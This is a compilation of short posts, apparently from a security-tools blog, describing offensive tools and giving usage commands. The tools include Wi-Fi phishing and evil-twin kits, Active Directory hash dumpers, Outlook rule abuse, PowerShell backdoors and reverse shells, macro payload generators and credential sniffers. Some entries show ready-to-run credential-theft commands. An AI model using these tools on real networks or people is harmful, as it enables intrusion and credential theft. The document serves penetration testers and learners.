Changelog wifipihser v1.3 15/4/2017:

o Introduced –quitonsuccess (-qS) option. [@javaes]
o Introduced Travis CI. [@d33tah]
o Install pylint in Travis. [@blackHatMonkey]
o Web server migration to Tornado. Fixes various bugs and increases performance. [@sophron]
o Remove DNS leases after the script restarts. [@laozi999]
o Introduced –internetinterface (-iI) option to provide Internet connectivity to victims. [@sophron]
o Added support for iOS and Android to our network manager imitation template. [@alexsalvetti]
o Introduced a new deauthentication module. [@blackHatMonkey]
o Introduced a new recon module, including new features in target AP selection phase. [@blackHatMonkey]
o Code refactoring including a more modular design. [@sophron]
o Introduced accesspoint module serving as a hostapd wrapper. [@sophron]
o Introducing Lure10, an attack for automatic association against Windows devices. [@sophron]

wifiphisher v1.3

wifiphisher v1.2

Wifiphisher is a security tool that mounts fast automated phishing attacks against WPA networks in order to obtain the secret passphrase. It is a social engineering attack that unlike other methods it does not include any brute forcing. It is an easy way for obtaining WPA credentials.

Fast automated phishing attacks against WPA networks

From the victim’s perspective, the attack makes use in three phases:
– Victim is being deauthenticated from her access point. Wifiphisher continuously jams all of the target access point’s wifi devices within range by sending deauth packets to the client from the access point, to the access point from the client, and to the broadcast address as well.
– Victim joins a rogue access point. Wifiphisher sniffs the area and copies the target access point’s settings. It then creates a rogue wireless access point that is modeled on the target. It also sets up a NAT/DHCP server and forwards the right ports. Consequently, because of the jamming, clients will start connecting to the rogue access point. After this phase, the victim is MiTMed.
– Victim is being served a realistic router config-looking page. wifiphisher employs a minimal web server that responds to HTTP & HTTPS requests. As soon as the victim requests a page from the Internet, wifiphisher will respond with a realistic fake page that asks for WPA password confirmation due to a router firmware upgrade.
Requirements :
– Kali Linux.
– Two network interfaces, one wireless.
– A wireless card capable of injection.

USAGE : 

git clone https://github.com/sophron/wifiphisher
cd wifiphisher
python wifiphisher.py -h (for helper)

update:
cd wifiphisher
git pull

Download:   v1.3.zip  | v1.3.tar.gz | or clone url

Source : https://github.com/sophron/wifiphisher | Our Post before

EAPHammer is a toolkit for performing targetted evil twin attacks against WPA2-Enterprise networks. It is designed to be used in full scope wireless assessments and red team engagements. As such, focus is placed on providing an easy-to-use interface that can be leveraged to execute powerful wireless attacks with minimal manual configuration.
Features:
– Steal RADIUS credentials from WPA-EAP and WPA2-EAP networks.
– Perform hostile portal attacks to steal AD creds and perform indirect wireless pivots
– Perform captive portal attacks
– Built-in Responder integration
– Support for Open networks and WPA-EAP/WPA2-EAP
– No manual configuration necessary for most attacks.
– No manual configuration necessary for installation and setup process

Dependencies:
+ python-devel vs python-dev
+ service vs systemctl
+ network-manager vs NetworkManager
+ httpd vs apache2

Usage:

git clone https://github.com/s0lst1c3/eaphammer.git && cd eaphammer
./eaphammer --cert-wizard

Stealing RADIUS Credentials From EAP Networks:
./eaphammer --bssid 1C:7E:E5:97:79:B1 --essid Example --channel 2 --interface wlan0 --auth ttls --creds
./eaphammer --bssid 00:11:22:33:44:00 --essid h4x0r --channel 4 --wpa 2 --auth ttls --interface wlan0 --creds

Stealing AD Credentials Using Hostile Portal Attacks:
./eaphammer --interface wlan0 --bssid 1C:7E:E5:97:79:B1 --essid EvilC0rp --channel 6 --auth peap --wpa 2 --hostile-portal
./eaphammer --interface wlan0 --essid TotallyLegit --channel 1 --auth open --hostile-portal

Source: https://github.com/s0lst1c3

Changelog PytheM v0.6.7:
+ ARP spoofing improve.
+ History completer for session.
+ adding more command-line help messages.
+ http sniffer updated.
+ SSLKill as Thread.
+ improving SSLKill with PytheM.

PytheM v0.6.7

pforensic

PytheM is a Python penetration testing framework.

ARPspoof mode:
+ gateway
+ targets
+ interface
+ arpmode
+ myip & mymac

helper

Feature:
+ ARP spoofing – Man-in-the-middle HTTP
+ ARP+DNS spoof – fake page redirect to credential harvester
+ webform & SSH Brute-Force attack
+ Web page formulary brute-force
+ URL content buster
+ Call the voice-controlled assistant Jarvis
+ Decode a base64 url encoded cookie value.
+ pForensic a packet-analyzer.

Usage:

sudo apt-get update
sudo apt-get install build-essential python-dev tcpdump
sudo apt-get install libnetfilter-queue-dev libffi-dev libssl-dev

git clone https://github.com/m4n3dw0lf/PytheM && cd PytheM
sudo pip install -r requirements.txt 
python pythem.py -h

Update:
git pull origin master

Source: https://github.com/m4n3dw0lf | Our Post Before

ADPWN is a Useful tools for Windows AD explotaition and pwning. dsinternalsparser.py This tool makes easy and faster the dumping process of hashes stored in a domain controller.
Note
* It uses the output of the DSInternals modules that retreives reversibly encrypted plaintext passwords, password hashes and Kerberos keys of all user accounts from domain controllers.

* As mentioned in DSInternals web page(https://www.dsinternals.com/en/), it is possible to retrieve hashes remotely, instead of the well known method using vssadmin, ESEDBTOOLS and NTDSXtract, pretty slow in some cases because of the NTDS.dit size, ESEDBTOOLS misconfigurations, etc.

DSInternals Parser v1.0

Requirements
– Python 2.7 environment
– DSInternals output file generated with Get-ADReplAccount or Get-ADDBAccount.

TODO:
To extract the hashes remotely:
1. Retrieve all users attributes with the DSinternals module Get-ADReplAccount, and save it to a local file.

Get-ADReplAccount -All -NamingContext 'DC=Example,DC=com' -Server DC1 -Credential $cred >> localfile.txt

The file generated has a format similar to the next one.

DistinguishedName: CN=April Reagan,OU=IT,DC=Adatum,DC=com
Sid: S-1-5-21-3180365339-800773672-3767752645-1375
Guid: 124ae098-699b-4450-a47a-314a29cc90ea
SamAccountName: April
SamAccountType: User
UserPrincipalName: April@adatum.com
PrimaryGroupId: 513
SidHistory: 
Enabled: True
Deleted: False
LastLogon: 
DisplayName: April Reagan
GivenName: April
Surname: Reagan
Description: 
NTHash: 92937945b518814341de3f726500d4ff
LMHash: 727e3576618fa1754a3b108f3fa6cb6d
NTHashHistory: 
  Hash 01: 92937945b518814341de3f726500d4ff
  Hash 02: 1d3da193d2f45911a6f0fa940b9fb32f
  Hash 03: 402bc59d8a00641b7f386e78596340f4
LMHashHistory: 
  Hash 01: 727e3576618fa1754a3b108f3fa6cb6d
  Hash 02: 5a5503d0e85f58abaad3b435b51404ee
  Hash 03: f9393d97e7a1873caad3b435b51404ee
SupplementalCredentials:
  ClearText: Pa$$w0rd
  Kerberos:
    Credentials:
      DES_CBC_MD5
        Key: 76fe3b5bda911a40
    OldCredentials:
      DES_CBC_MD5
        Key: 7f8c4f38e0ea0b80
    Salt: ADATUM.COMApril
    Flags: 0
  KerberosNew:
    Credentials:
      AES256_CTS_HMAC_SHA1_96
        Key: 3a3b6a89bb82d112db5ef68f6db5d1afc2b806df61dcd85e3eacf3b85ee382d8
        Iterations: 4096
      AES128_CTS_HMAC_SHA1_96
        Key: a72c8bc96c4a6f03244f0b0067a1e440
        Iterations: 4096
      DES_CBC_MD5
        Key: 76fe3b5bda911a40
        Iterations: 4096
    OldCredentials:
      AES256_CTS_HMAC_SHA1_96
        Key: 14e46244a59a37cd8aa7c1fe61896441c7d065fafe4874191e69c1fe28856810
        Iterations: 4096
      AES128_CTS_HMAC_SHA1_96
        Key: 034b512ec64286dec951d6aff8d81fa8
        Iterations: 4096
      DES_CBC_MD5
        Key: 7f8c4f38e0ea0b80
        Iterations: 4096
    OlderCredentials:
      AES256_CTS_HMAC_SHA1_96
        Key: 2387ca8f936c8c154996809af8fee7c47fe4b9b5dd84d051fc43a9289bbaa3ab
        Iterations: 4096
      AES128_CTS_HMAC_SHA1_96
        Key: 29d536ec057f9063747161429b81f056
        Iterations: 4096
      DES_CBC_MD5
        Key: 58f1cbe6e50e1f83
        Iterations: 4096
    ServiceCredentials:
    Salt: ADATUM.COMApril
    DefaultIterationCount: 4096
    Flags: 0
  WDigest:
    Hash 01: c3d012ab1101eb8f51b483fb4c5f8a7e
    Hash 02: c993da396914645b356ae7816251fcb1
    Hash 03: 6b58530cab34de91189a603e22c2be15
    Hash 04: c3d012ab1101eb8f51b483fb4c5f8a7e
    Hash 05: 5a762cf59fa31023dcba1ebd4725b443
    Hash 06: c78bac91c0ba25cae5d44460fd65a73b
    Hash 07: 59d73cea16afd1aac6bf8acfa2768621
    Hash 08: d2be383db9469a39736d9e2136054131
    Hash 09: 079de9f4d94d97a80f1726497dfd1cc2
    Hash 10: 85dbe1549d5fbfcc91f7fe5ac5910f52
    Hash 11: 961a36bded5535b8fc15b4b8e6c48b93
    Hash 12: 6ac8a60d83e9ae67c2097db716a6af17
    Hash 13: e899e577d5f81ef5288ab67de07fad9a
    Hash 14: 135452ab86d40c3d47ca849646d5e176
    Hash 15: a84c367eaa334d0a4cb98e36da011e0f
    Hash 16: 61a458eb70440b1a92639452f0c2c948
    Hash 17: 238f4059776c3575be534afb46be4ccf
    Hash 18: 03ddf370064c544e9c6dbb6ccbf8f4ac
    Hash 19: 354dd6c77ccf35f63e48cd5af6473ccf
    Hash 20: 5f9800d734ebe9fb588def6aaafc40b7
    Hash 21: 59aab99ebcddcbf13b96d75bb7a731e3
    Hash 22: f1685383b0c131035ae264ee5bd24a8d
    Hash 23: 3119e42886b01cad00347e72d0cee594
    Hash 24: ebef7f2c730e17ded8cba1ed20122602
    Hash 25: 7d99673c9895e0b9c484e430578ee78e
    Hash 26: e1e20982753c6a1140c1a8241b23b9ea
    Hash 27: e5ec1c63e0e549e49cda218bc3752051
    Hash 28: 26f2d85f7513d73dd93ab3afd2d90cf6
    Hash 29: 84010d657e6b58ce233fae2bd7644222

2. Parse the localfile with dsinternaslparser.py
./dsinternalsparser.py -o dump localfile.txt
3. After execution, if no options are given, dsinternalsparser.py creates 6 files.
– NTLM File (dump_ntlm.txt): Contains username and current NTLM Hash.
– NTLM History File (dump_ntlm_history.txt): Contains username and NTLM History Hashes.
– LM File (dump_lm.txt): Contains username and current LM Hash.
– Cleartext File (dump_cleartext.txt): Contains username and Cleartext password, if exists.
– NTLM History File (dump_wdigest.txt): Contains username and WDigest history Hashes.

Usage:

git clone https://github.com/r4wd3r/ADPWN && cd ADPWN

wget https://raw.githubusercontent.com/r4wd3r/ADPWN/master/dsinternalsparser/dsinternalsparser.py
chmod 755 dsinternalsparser.py
python dsinternalsparser.py

Source: https://github.com/r4wd3r

RSA tool for ctf – uncipher data from weak public key and try to recover private key Automatic selection of best attack for the given public key

Attacks :
– Weak public key factorization
– Wiener’s attack
– Hastad’s attack (Small exponent attack)
– Small q (q<100,000)
– Common factor between ciphertext and modulus attack
– Fermat’s factorisation for close p and q
– Gimmicky Primes method
– Past CTF Primes method
– Self-Initializing Quadratic Sieve (SIQS) using Yafu – NEW
– Common factor attacks across multiple keys – NEW

Rsa Ctf Tool

Requirements:
* GMPY
* libnum (https://github.com/hellman/libnum.git)

Todo
+ Implement multiple ciphertext handling for more attacks
+ Implement ECM factoring
+ Implement support for MultiPrime RSA (see 0ctf 2016)
+ Possibly implement Msieve support…
+ Some kind of polynomial search…

Usage:

git clone https://github.com/hellman/libnum.git && cd libnum
python setup.py install

git clone https://github.com/Ganapati/RsaCtfTool && cd RsaCtfTool
python RsaCtfTool.py --publickey ./key.pub --private

Example:
./RsaCtfTool.py --createpub --n 782837482376192871287389789773981723...12839802 --e 768557

Source: https://github.com/Ganapati

Latest Changelog ruler v2.1.4:
+ Fixes a few niggles with forms being displayed and deleted
+ restore DecodeBufferToRows to working version.
+ Adds the –rule option that creates a new rule to auto delete the form email as it arrives. This causes the form to trigger
+ Adds the ability to trigger a shell through Outlook forms.

ruler v2.1.4

ruler v2.0

Ruler is a tool that allows you to interact with Exchange servers through the MAPI/HTTP protocol. The main aim is abuse the client-side Outlook mail rules.
Ruler has multiple functions and more are planned. These include
* Enumerate valid users
* View currently configured mail rules
* Create new malicious mail rules
* Delete mail rules
Ruler attempts to be semi-smart when it comes to interacting with Exchange and uses the Autodiscover service (just as your Outlook client would) to discover the relevant information.

Features:
+ Brute-force for credentials
+ The autodiscover service
+ PtH – Passing the hash
+ Display existing rules / verify account
+ Delete existing rules (clean up after yourself)
+ Popping a shell
+ Semi-Autopwn
Use, download and build from source:

git clone https://github.com/sensepost/ruler && cd ruler
go get github.com/sensepost/ruler
go get github.com/urfave/cli
go get github.com/staaldraad/go-ntlm/ntlm
go build
./ruler

Upgrade: git pull

Download: ruler-linux32  | ruler-linux64  | ruler-osx64
Source: https://github.com/sensepost | Our Post Before

Changelog needle v1.1.0 – 2017-05-05:
* Added
– [CORE] Issue Auto-Detection: modules will now automatically detect and keep track of issues in the target app. All the issues are going to be stored in the issues.db SQLite database, contained in the chosen output directory. Every issue will hold the following attributes: app, module, name, content, confidence level (‘HIGH’, ‘MEDIUM’, ‘INVESTIGATE’, ‘INFORMATIONAL’), outfile
– [CORE] New commands: issues (list all the issues identified), add_issue (manually add an issue to the collection)
– [CORE] Frida Attach or Spawn: added option in Frida modules to either attach to or spawn a process
– [CORE] New global option: skip_output_folder_check. It allows to skip the check that ensures the output folder does not already contain other files
– [MODULE] Created the device category
– [MODULE] Dependency Installer (device/dependency_installer)
– [MODULE] MDM Effective User Settings (mdm/effective_user_settings) [from @osimonnet]

* Fixed
– [CORE] Moved installation of dependencies to its own module (device/dependency_installer)
– [CORE] Frida support for 32bit devices
– [CORE] Automatic reconnection if SSH/Agent connection drops (Retry decorator)
– [CORE] Re-introduce support for ipainstaller (iOS<10)
– [MODULE] Compatibility of modules requiring app decryption (iOS 10)

* Removed
– [CORE] SETUP_DEVICE global option, in favour of device/dependency_installer

needle v1.1.0

needle v1.0.0

needle v0.0.4

Assessing the security of an iOS application typically requires a plethora of tools, each developed for a specific need and all with different modes of operation and syntax. The Android ecosystem has tools like “drozer” that have solved this problem and aim to be a ‘one stop shop’ for the majority of use cases, however iOS does not have an equivalent.

Needle is an open source modular framework which aims to streamline the entire process of conducting security assessments of iOS applications, and acts as a central point from which to do so. Given its modular approach, Needle is easily extensible and new modules can be added in the form of python scripts. Needle is intended to be useful not only for security professionals, but also for developers looking to secure their code. A few examples of testing areas covered by Needle include: data storage, inter-process communication, network communications, static code analysis, hooking and binary protections. The only requirement in order to run Needle effectively is a jailbroken device.

Needle v0.0.3

Needle has been successfully tested on both Kali and OSX.

Usage & Download from git:

git clone https://github.com/mwrlabs/needle.git && cd needle
cd needle

Kali 2.0 and Rolling:
# Unix packages
sudo apt-get install python2.7 python2.7-dev sshpass sqlite3 libimobiledevice4 libimobiledevice-utils lib32ncurses5-dev

# Python packages
sudo pip install readline
sudo pip install paramiko
sudo pip install sshtunnel
sudo pip install frida
sudo pip install mitmproxy
sudo pip install biplist

Macintosh/OSX:
# Core dependencies
brew install python
brew install libxml2
xcode-select --install

# Python packages
sudo -H pip install --upgrade --user readline
sudo -H pip install --upgrade --user paramiko
sudo -H pip install --upgrade --user sshtunnel
sudo -H pip install --upgrade --user frida
sudo -H pip install --upgrade --user biplist

# sshpass
brew install https://raw.githubusercontent.com/kadwanev/bigboybrew/master/Library/Formula/sshpass.rb

# mitmproxy
wget https://github.com/mitmproxy/mitmproxy/releases/download/v0.17.1/mitmproxy-0.17.1-osx.tar.gz
tar -xvzf mitmproxy-0.17.1-osx.tar.gz
sudo cp mitmproxy-0.17.1-osx/mitm* /usr/local/bin/

# libimobiledevice4
brew install -v --fresh automake autoconf libtool wget libimobiledevice
brew install -v --HEAD --fresh --build-from-source ideviceinstaller

Upgrade:
git pull origin master

Download: v1.1.0.zip  | v1.1.0.tar.gz
Source: https://github.com/mwrlabs | Our Post Before

DATA is a Python and bash script for Credential Phishing Analysis and Automation.
Script Lists:
* BUCKLEGRIPPER (py)
– Given a suspected phishing url or file of line separated urls, visit, screenshot, and scrape for interesting files.
– Requirements can be installed by running or reviewing install_bucklegripper_deps.sh

* BULLYBLINDER (py)
– While capturing a pcap visit a suspected phishing page. Handle redirectors and obfuscation to find a web form. Scrape the form and make educated guesses at what should be entered into the fields. Submit the form and repeat.
– Requirements can be installed by running or reviewing install_bullyblinder_deps.sh

* SLICKSHOES (sh)
– A basic bash script that pulls urls out of pdfs in streams or in clear view.
– The only argument to the script is the path to a folder containing the pdfs you want to process.
– REQUIRES pdf-parser.py from https://blog.didierstevens.com/programs/pdf-tools/ location to be set in first line of script

DATA

Usage:

git clone https://github.com/hadojae/DATA && cd DATA
cd bucklegripper
./install_bucklegripper_deps.sh
python2 bucklegripper.py -h
python bucklegripper.py -s openphish -r ../../test_urls.txt


cd bullyblinder
./install_bullyblinder_deps.sh
python2 bullyblinder.py

Source: https://github.com/hadojae

PowEnum is a Penetration testers commonly enumerate AD data – providing domain situational awareness and helping to identify soft targets. PowEnum helps automate the cartological view of your target domain.

PowEnum executes common PowerSploit Powerview functions and combines the output into a spreadsheet for easy analysis. All network traffic is only sent to the DC(s).
Syntax Examples:
– Invoke-PowEnum
– Invoke-PowEnum -PowerviewURL http://10.0.0.10/PowerView.ps1
– Invoke-PowEnum -FQDN test.domain.com
– Invoke-PowEnum -Mode SYSVOL
– Invoke-PowEnum -Credential test.domain.com\username -FQDN test.domain.com -Mode Special

PowEnum

Detection:
This enumeration will generate suspicious traffic between the PowEnum system and the target DC(s). If there are security products watching traffic to the DC(s) (i.e. Microsoft ATA) PowEnum will likely get flagged.

Usage:

git clone https://github.com/whitehat-zero/PowEnum && cd PowEnum
Invoke-PowEnum
Invoke-PowEnum -PowerviewURL http://10.0.0.10/PowerView.ps1
Invoke-PowEnum -FQDN test.domain.com
Invoke-PowEnum -Mode SYSVOL
Invoke-PowEnum -Credential test.domain.com\username -FQDN test.domain.com -Mode Special

Source: https://github.com/whitehat-zero

Changelog Nishang v0.7.2 from v0.7.0:
0.7.2
– Added Invoke-PowershellTcpOnelineBind to the Shells directory.
0.7.1
– Added Invoke-AmsiBypass to the Bypass directory.

Nishang v0.7.2

Nishang v0.7.0

nishang v0.6.9

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and penetration testing. Nishang is useful during various phases of a penetration test and is most powerful for post exploitation usage.

Nishang v-0.6.2 released: PowerShell for penetration testing and offensive security.

Scripts; Nishang currently contains the following scripts and payloads.
+ Antak – the Webshell
– Antak :Execute PowerShell scripts in memory, run commands, and download and upload files using this webshell

+ Backdoors
– HTTP-Backdoor : A backdoor which can receive instructions from third party websites and execute PowerShell scripts in memory.
– DNS_TXT_Pwnage : A backdoor which can receive commands and PowerShell scripts from DNS TXT queries, execute them on a target, and be remotely controlled using the queries.
– Execute-OnTime : A backdoor which can execute PowerShell scripts at a given time on a target.
– Gupt-Backdoor : A backdoor which can receive commands and scripts from a WLAN SSID without connecting to it.
– Add-ScrnSaveBackdoor : A backdoor which can use Windows screen saver for remote command and script execution.
– Invoke-ADSBackdoor : A backdoor which can use alternate data streams and Windows Registry to achieve persistence.

+ Client
– Out-CHM : Create infected CHM files which can execute PowerShell commands and scripts.
– Out-Word : Create Word files and infect existing ones to run PowerShell commands and scripts.
– Out-Excel : Create Excel files and infect existing ones to run PowerShell commands and scripts.
– Out-HTA : Create a HTA file which can be deployed on a web server and used in phishing campaigns.
– Out-Java : Create signed JAR files which can be used with applets for script and command execution.
– Out-Shortcut : Create shortcut files capable of executing commands and scripts.
– Out-WebQuery : Create IQY files for phishing credentials and SMB hashes.

+ Escalation
– Enable-DuplicateToken : When SYSTEM privileges are required.
– Remove-Update : Introduce vulnerabilities by removing patches.

+ Execution
– Download-Execute-PS : Download and execute a PowerShell script in memory.
– Download_Execute : Download an executable in text format, convert it to an executable, and execute.
– Execute-Command-MSSQL : Run PowerShell commands, native commands, or SQL commands on a MSSQL Server with sufficient privileges.
– Execute-DNSTXT-Code : Execute shellcode in memory using DNS TXT queries.

+ Gather
– Check-VM : Check for a virtual machine.
– Copy-VSS : Copy the SAM file using Volume Shadow Copy Service.
– Invoke-CredentialsPhish : Trick a user into giving credentials in plain text.
– FireBuster FireListener: A pair of scripts for egress testing
– Get-Information : Get juicy information from a target.
– Get-LSASecret : Get LSA Secret from a target.
– Get-PassHashes : Get password hashes from a target.
– Get-WLAN-Keys: Get WLAN keys in plain text from a target.

+ Keylogger
Log keystrokes from a target.
– Invoke-MimikatzWdigestDowngrade: Dump user passwords in plain on Windows 8.1 and Server 2012
– Get-PassHints : Get password hints of Windows users from a target.

+ Pivot
– reate-MultipleSessions : Check credentials on multiple computers and create PSSessions.
– Run-EXEonRemote Copy and execute an executable on multiple machines.
– Invoke-NetworkRelay Create network relays between computers.

+ Prasadhak
– Prasadhak : Check running hashes of running process against the VirusTotal database.

+ Scan
– Brute-Force : Brute force FTP, Active Directory, MSSQL, and Sharepoint.
– Port-Scan : A handy port scanner

+ Powerpreter
Powerpreter : All the functionality of nishang in a single script module.

+ Shells :
– Invoke-PsGcat: Send commands and scripts to specifed Gmail account to be executed by Invoke-PsGcatAgent
– Invoke-PsGcatAgent: Execute commands and scripts sent by Invoke-PsGcat.
– Invoke-PowerShellTcp: An interactive PowerShell reverse connect or bind shell
– Invoke-PowerShellTcpOneLine : Stripped down version of Invoke-PowerShellTcp. Also contains, a skeleton version which could fit in two tweets.
– Invoke-PowerShellUdp : An interactive PowerShell reverse connect or bind shell over UDP
– Invoke-PowerShellUdpOneLine : Stripped down version of Invoke-PowerShellUdp.
– Invoke-PoshRatHttps : Reverse interactive PowerShell over HTTPS.
– Invoke-PoshRatHttp : Reverse interactive PowerShell over HTTP.
– Remove-PoshRat : Clean the system after using Invoke-PoshRatHttps
– Invoke-PowerShellWmi : Interactive PowerShell using WMI.
– Invoke-PowerShellIcmp : An interactive PowerShell reverse shell over ICMP.

+ Utility:
– Add-Exfiltration: Add data exfiltration capability to Gmail, Pastebin, a web server, and DNS to any script.
– Add-Persistence: Add reboot persistence capability to a script.
– Remove-Persistence: Remote persistence added by the Add-Persistence script.
– Do-Exfiltration: Pipe (|) this to any script to exfiltrate the output.
– Download: Transfer a file to the target.
– Parse_Keys : Parse keys logged by the keylogger.
– Invoke-Encode : Encode and compress a script or string.
– Invoke-Decode : Decode and decompress a script or string from Invoke-Encode.
– Start-CaptureServer : Run a web server which logs Basic authentication and SMB hashes.
— [Base64ToString] [StringToBase64] [ExetoText] [TexttoExe]

Download : Nishang.zip | Our Post Before
Source : http://www.labofapenetrationtester.com/

Roadmap changelog The PenTesters Framework version 1.14 from 1.10:
* added new flag INCLUDE_ONLY_THESE_MODULES (thanks cobbr)
* remove prompt for install update all for automatic install

~~~~~~~~~~~~~~~~~
version 1.13.1
~~~~~~~~~~~~~~~~~
* fixed fedora as supported platform throwing fedora_modules error
* changed github locations for the empyre and ps-empire changes

~~~~~~~~~~~~~~~~~
version 1.13
~~~~~~~~~~~~~~~~~
* added new field for modules called TOOL_DEPEND which allows you to specify other tools that are needed in order to install prereqs. Check README.md for more information.
* added fido
* fixed sparta ln usage

~~~~~~~~~~~~~~~~~
version 1.12
~~~~~~~~~~~~~~~~~
* add stickykeyslayer

ptf v1.14

~~~~~~~~~~~~~~~~~
version 1.11
~~~~~~~~~~~~~~~~~
* add inspy (git pr)
* add gobuster (git pr)
* add wso webshell (git pr)
* depend fixes (git pr)
* added aptitude as a check for debian as well as apt

ThePenTestersFramework(PTF)v1.14

The Pentesters Framework v1.10

ptf v1.91

The PenTesters Framework (PTF) is a Python script designed for Debian/Ubuntu/ArchLinux based distributions to create a similar and familiar distribution for Penetration Testing. As pentesters, we’ve been accustom to the /pentest/ directories or our own toolsets that we want to keep up-to-date all of the time. We have those “go to” tools that we use on a regular basis, and using the latest and greatest is important.
PTF attempts to install all of your penetration testing tools (latest and greatest), compile them, build them, and make it so that you can install/update your distribution on any machine. Everything is organized in a fashion that is cohesive to the Penetration Testing Execution Standard (PTES) and eliminates a lot of things that are hardly used. PTF simplifies installation and packaging and creates an entire pentest framework for you. Since this is a framework, you can configure and add as you see fit. We commonly see internally developed repos that you can use as well as part of this framework. It’s all up to you.
The ultimate goal is for community support on this project. We want new tools added to the github repository. Submit your modules. It’s super simple to configure and add them and only takes a few minute.

The PenTesters Framework (PTF) is a Python script designed for Debian/Ubuntu/ArchLinux based distributions to create a similar and familiar distribution for Penetration Testing.

Instructions:
First check out the config/ptf.config file which contains the base location of where to install everything. By default this will install in the /pentest directory. Once you have that configured, move to running PTF by typing ./ptf (or python ptf).
This will put you in a Metasploitesque type shell which has a similar look and feel for consistency. Show modules, use , etc. are all accepted commands. First things first, always type help or ? to see a full list of commands.

Update EVERYTHING!
If you want to install and/or update everything, simply do the following:

./ptf

use modules/install_update_all
run

This will install all of the tools inside of PTF. If they are already installed, this will iterate through and update everything for you automatically.
You can also show options to change information about the modules

Installation using git :

git clone https://github.com/trustedsec/ptf
cd ptf
./ptf

Update:
just typing update on ptf console

or download source : v1.14.zip  | v1.14.tar.gz
Source : https://github.com/trustedsec | Our Post Before

swap_digger is a bash script used to automate Linux swap analysis during post-exploitation or forensics. It automates swap extraction and searches for Linux user credentials, web forms credentials, web forms emails, http basic authentication, Wifi SSID and keys, etc.
Features:
+ Linux account clear-text passwords
+ Web login/passwords
+ Email addresses
+ Wifi network SSID and keys
+ GPG private keys
+ Keepass master key
+ Samba credentials

Usage:

git clone https://github.com/sevagas/swap_digger && cd swap_digger
sudo ./swap_digger.sh -vx

Source: https://github.com/sevagas

Cylon-Raider is an Easy and quick automation of Aircrack-ng “Replay-Attacks”, targeting WPA2-PSK encrypted routers (most home NATed networks and many small businesses). Guaranteed to capture the 4-way handshake of a decently populated router in under 10 minutes (at least 1 or 2 people logged onto router to properly de-authenticate and listen for their creds).
It can also detect and decloak hidden networks (see UNCLOAK HIDDEN NETWORKS) below

Lightweight Version of Wifi-Attack-Autoloader for Outdated Releases of Kali Nethunter Devices(Python 2.7.9) Designed to Capture the Handshake in Record Time so you can GTFO out of that area!

Cylon-Raider

RAIDER received a new update on Cinco De Mayo.
+ Substantially simplified menu
+ Less repetitive keystrokes (we all know how lousy tablet keyboards are)
+ Auto-saves the LAST target’s parameters in a temporary file(s) to switch between targeting listening and starting your replay-attack (w/o having to enter your data again)
+ Under the hood, substantially improved, and shortened code. In fact most of the modules in the folder are now obsolete. but I keep it around as a resource if I needed something

Raider, will soon be ported to ArmsCommander as a forked-update.
Who is this for?
– Anyone stuck with a crappy Asus Nexus 7 Tablet (2012), or any other device no longer officially supported by the Kali Nethunter Project. It sure kept my crappy tablet useful!
– Anyone dissatisfied with modern GUI versions of Wi-Fi Cracking software (Wifite was supposed to be something awesome, but disappointingly it took damn near forever and did not send enough deauth packets), I can capture the 4-Way WPA2-PSK Handshake in seconds using this, a automated version of Airmon/Aircrack. All it requires is a decent amount of clients on a wireless network for it to work.
– Sometimes referring back to the command line is a way better idea than rely on some GUI crap. It helps you maintain a better understanding of what is going on (or going wrong).

Installation:

mkdir tmp && cd /tmp
git clone https://github.com/tanc7/Cylon-Raider && cd Cylon-Raider
Run autoInstallerNethunter.sh

cd /tmp/Cylon-Raider/
chmod 777 autoInstallerNethunter.sh
./autoInstallerNethunter.sh

Source: https://github.com/tanc7

LEGAL DISCLAMER
The author does not hold any responsibility about the bad use of this script, remember that attacking targets without prior concent its ilegal and punish by the law, this script was build to show how resource files can automate tasks.

macphish is a Office for Mac Macro Payload Generator.
There are 4 attack vectors available:
+ beacon
+ credentials
+ meterpreter
+ meterpreter-grant
+ For the ‘creds’ method, macphish can generate the Applescript script directly, in case you need to run it from a shell.

Dependencies:
– Python 2.7.x and Mac-OS

Usage:

git clone https://github.com/cldrn/macphish && cd macphish
beacon payload:
./macphish.py -a beacon -lh <host>

To generate the macro:
./macphish.py -a creds -m -lh <host>

To generate the Applescript payload to be executed from a shell:
./macphish.py -a creds -lh <host>

Source: https://github.com/cldrn

Disclaimer
This tool has been published educational purposes in order to teach people how bad guys could track them or monitor them or obtain information from their credentials, we are not responsible for the use or the scope that may have the People through this project.

We are totally convinced that if we teach how vulnerable things are, we can make the Internet a safer place.

Trape is a recognition tool that allows you to track people, the information you can get is very detailed. We want to teach the world through this, as large Internet companies could monitor you, obtaining information beyond your IP.

trape

Some benefits
+ One of its most enticing functions is the remote recognition of sessions. You can know where a person has logged in, remotely. This occurs through a Bypass made to the Same Origin Policy (SOP)
+ Currently you can try everything from a web interface. (The console, becomes a preview of the logs and actions)
+ Registration of victims, requests among other data are obtained in real time.
+ If you get more information from a person behind a computer, you can generate a more direct and sophisticated attack. Trape was used at some point to track down criminals and know their behavior.
+ You can do real time phishing attacks
+ Simple hooking attacks
+ Mapping
+ Important details of the objective
+ Capturing credentials

Usage:

git clone https://github.com/boxug/trape && cd trape
pip install -r requirements.txt
python trape.py -h
Example: python trape.py --url http://localhost --port 8080

Source: https://github.com/boxug

net-creds Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification.

net-creds

Can Sniff:
+ URLs visited
+ POST loads sent
+ HTTP form logins/passwords
+ HTTP basic auth logins/passwords
+ HTTP searches
+ FTP logins/passwords
+ IRC logins/passwords
+ POP logins/passwords
+ IMAP logins/passwords
+ Telnet logins/passwords
+ SMTP logins/passwords
+ SNMP community string
+ NTLMv1/v2 all supported protocols: HTTP, SMB, LDAP, etc.
+ Kerberos

Usage:

git clone https://github.com/DanMcInerney/net-creds && cd net-creds
pip install -r requirements.txt
sudo python net-creds.py -i eth0
sudo python net-creds.py -f 192.168.1.1

Source: https://github.com/DanMcInerney

Legal Disclaimer:
Developer and author not responsible for anything you do with this program, so please only use it for good and educational purposes.

portSpider is a tool for scanning huge network ranges to find open ports and vulnerable services. This tool is not intended to scan one target, rather a whole IP range. (eg. 192.168.0.0/24) Most of the time companies/organizations have public information about their owned public IP ranges, so portSpider will help you to scan all of their machines at once for vulnerable devices/services.

portSpider v1.0

modules:
+ http – Scan for open HTTP ports, and get the titles.
+ mysql – Scan for open MySQL servers, and try to log in with the default credentials.
+ mongodb – Scan for open MongoDB instances, and check if they are password protected.
+ ssh – Scan for open SSH ports.
+ printer – Scan for open printer ports and websites.
+ gameserver – Scan for open game server ports.
+ manual – Scan custom ports.

Usage:

git clone https://github.com/xdavidhu/portSpider && cd portSpider
pip3 install -r requirements.txt
